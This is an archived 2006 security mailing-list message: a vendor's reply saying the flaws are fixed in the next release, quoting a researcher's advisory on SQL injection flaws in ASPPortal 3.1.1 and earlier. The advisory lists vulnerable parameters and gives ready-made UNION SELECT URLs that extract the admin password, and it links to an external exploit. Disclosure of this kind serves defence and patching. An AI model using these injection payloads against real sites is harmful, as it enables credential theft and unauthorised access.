lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <0BA459599EC94F9CB36FFB99C63B54CE.MAI@purpleolive.net>
Date: Wed, 22 Mar 2006 09:38:10 +0100
From: "Suport Account" <support@...portal.net>
To: <nukedx@...edx.com>, <full-disclosure@...ts.grok.org.uk>,
	<bugtraq@...urityfocus.com>
Subject: Re: [SPAM:] - ASPPortal <= 3.1.1 Multiple Remote
	SQL Injection Vulnerabilities - Email has different SMTP TO:
	and MIME TO: fields in the email addresses

HI

These issues has been fixed in ASPPortal version 3.1.2
Due for release end of april

Regards,
ASPPortal Support

----- Original Message -----
From: nukedx@...edx.com
To:  full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,       support@...portal.net
Sent:  Tue, 21 Mar 2006 22:29:02 +0200
Subject: [SPAM:] - ASPPortal <= 3.1.1 Multiple Remote SQL Injection Vulnerabilities - Email has
different SMTP TO: and MIME TO: fields in the email addresses

--Security Report--
Advisory: ASPPortal <= 3.1.1 Multiple Remote SQL Injection Vulnerabilities
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 20/03/06 11:14 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@...edx.com
Web: http://www.nukedx.com
}
---
Vendor: ASPPortal (http://www.ASPPortal.net/)
Version: 3.1.1 and prior versions must be affected.
About: There is lots of SQL injections in modules of ASPPortal via this methods
remote attacker can inject arbitrary
SQL queries.In below i included some with their examples and also coded exploit
for second one exploit decrypts password
which comes from SQL injection too, Because ASPPortal has it own crypting
mechanism.As you can see in downloads module
page download_click.asp's downloadid parameter and news module page
News_Item.asp's content_ID parameter did not sanitized
properly.Also there is some SQL injections in admin panel but for using them you
need admin access.You can found them in below
as ADMINGET and ADMINPOST tags.
Level: Critical
---
How&Example:
GET ->
http://[site]/apdir/content/downloads/download_click.asp?downloadid=[SQLCode]
GET -> http://[site]/apdir/content/news/News_Item.asp?content_ID=[SQLCode]
Example ->
http://[site]/apdir/content/downloads/download_click.asp?downloadid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,
0,0,
password+FROM+users+where+username='admin'
Example ->
http://[site]/apdir/content/news/News_Item.asp?content_ID=-1+UNION+SELECT+username,password,0,0,
group_id,email,0,0,0,0,0,0,0,0,0,0+FROM+users+where+username='admin'
With this examples remote attacker could get admin's pass and can login from
/content/users/login.asp
ADMINGET ->
http://[site]/apdir/content/users/add_edit_user.asp?page_type=2&user_id=[SQLCode]
ADMINGET ->
http://[site]/apdir/content/banner_adds/banner_add_edit.asp?pagetype=2&bannerid=[SQLCode]
ADMINGET ->
http://[site]/apdir/content/categories/add_edit_cat.asp?page_type=2&cat_id=[SQLCode]
ADMINGET ->
http://[site]/apdir/content/News/add_edit_news.asp?page_type=2&Content_ID=[SQLCode]
ADMINGET ->
http://[site]/apdir/content/downloads/add_edit_download.asp?page_type=2&download_id=[SQLCode]
ADMINGET ->
http://[site]/apdir/content/poll/add_edit_poll.asp?page_type=2&Poll_ID=[SQLCode]
ADMINGET ->
http://[site]/apdir/content/contactus/contactus_add_edit.asp?contactid=[SQLCode]&pageid=2
ADMINGET ->
http://[site]/apdir/content/poll/poll_list.asp?sortby=[SQLCode]&page_no=1
ADMINPOST ->
http://[site]/apdir/content/downloads/add_edit_download.asp?page_type=1
--
Timeline:
* 20/03/2006: Vulnerability found.
* 20/03/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=21
---
References:
http://www.milw0rm.com/id.php?id=1597
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=21


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ